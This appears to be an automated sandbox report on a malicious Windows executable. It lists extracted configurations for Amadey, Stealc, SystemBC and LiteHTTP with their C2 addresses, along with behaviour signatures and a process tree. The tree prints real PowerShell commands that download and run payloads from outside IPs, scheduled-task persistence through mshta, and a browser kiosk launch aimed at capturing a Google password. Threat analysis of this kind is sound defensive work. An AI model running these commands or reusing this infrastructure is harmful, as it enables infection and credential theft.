Overview

overview

10

Static

static

3

a2c378db75...72.exe

windows7-x64

10

a2c378db75...72.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    06/03/2025, 02:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe

  • Size

    3.0MB

  • MD5

    831dc548d9e825728101443319ad693b

  • SHA1

    57acc87997257d269bfe5cbeafe2cef792130c9c

  • SHA256

    a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972

  • SHA512

    0bc8e4182f6b3cbab8c8a40db9bb537dd66ebbf87fed1ae2c79d32b006d9670f5d6aab8ae0e18be2013a57a3bed7b435258cf853f61649cf2b784dbde35a521d

  • SSDEEP

    98304:E/FI5ZJSC2thIjrHI8FCPS4GCwaHLDvV:Ukw5GCwarDvV

Score
10/10
amadeygcleanerhealerlitehttpstealcsystembc092155trumpbotdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

V���ח� ��4rAҿb w��xg
Attributes
  • dns

    5.132.191.104

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Powershell Invoke Web Request.

    execution
  • Downloads MZ/PE file 18 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 25 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 57 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 50 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
    "C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Downloads MZ/PE file
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2676
    • C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe
      "C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3008
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
          "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2336
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9D29.tmp\9D2A.tmp\9D2B.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2040
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2088
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1120
        • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
          "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
            "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
            5⤵
            • Downloads MZ/PE file
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:296
            • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
              "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2684
        • C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe
          "C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2500
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1748
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2276
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1224
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2836
              • C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE
                "C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:2388
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2900
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1808
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2960
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2192
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2096
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1888
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2092
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1688
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "KuBZrmaKyUJ" /tr "mshta \"C:\Temp\VNx3gTICP.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1680
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\VNx3gTICP.hta"
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:936
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1644
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:2440
        • C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe
          "C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2796
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            5⤵
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2088
        • C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe
          "C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2112
          • C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe
            "C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3008
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 1020
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:772
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 508
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:2856
        • C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe
          "C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2280
          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            5⤵
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:2800
        • C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe
          "C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:1752
        • C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe
          "C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:344
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1204
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:1812
        • C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe
          "C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1124
        • C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe
          "C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:304
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM firefox.exe /T
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1752
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM chrome.exe /T
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1764
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM msedge.exe /T
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2892
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM opera.exe /T
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1732
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1028
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            5⤵
              PID:3056
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                6⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:2416
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.0.1404389395\1587828078" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1244 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b681ec8d-5d35-487d-8b3e-c7bb73e798bb} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1352 101d8c58 gpu
                  7⤵
                    PID:1452
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.1.1074487475\2015986347" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8f1d330-493f-4204-865d-da67d0e22595} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1544 eeeb258 socket
                    7⤵
                      PID:2828
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.2.122218642\1120858895" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a181cd1-bc5b-461d-b6bb-1934de5fb0e0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2000 19f72158 tab
                      7⤵
                        PID:2548
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.3.258885724\1036051148" -childID 2 -isForBrowser -prefsHandle 2756 -prefMapHandle 2752 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0887fe63-5db0-427d-9249-418af38093f7} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2768 1b31bd58 tab
                        7⤵
                          PID:1748
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.4.783715881\1406145648" -childID 3 -isForBrowser -prefsHandle 3868 -prefMapHandle 3864 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {157a3b0f-d809-4fad-9176-d73dc0da1f4d} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3880 207da558 tab
                          7⤵
                            PID:388
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.5.1641785714\443642166" -childID 4 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {753f3ee8-a3e6-4ddb-8e77-4a5ec56d69a5} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3976 207dba58 tab
                            7⤵
                              PID:1580
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.6.300588055\2014769721" -childID 5 -isForBrowser -prefsHandle 4192 -prefMapHandle 4196 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78747322-58cb-47c8-ae37-fd689bb247b0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 4180 1f641a58 tab
                              7⤵
                                PID:912
                        • C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe
                          "C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe"
                          4⤵
                          • Modifies Windows Defender DisableAntiSpyware settings
                          • Modifies Windows Defender Real-time Protection settings
                          • Modifies Windows Defender TamperProtection settings
                          • Modifies Windows Defender notification settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3264
                        • C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
                          "C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:3556
                        • C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
                          "C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:3736
                        • C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
                          "C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"
                          4⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3184
                        • C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
                          "C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:3512
                          • C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
                            "C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
                            5⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3992
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 500
                            5⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:4120
                        • C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
                          "C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4932
                  • C:\Windows\system32\taskeng.exe
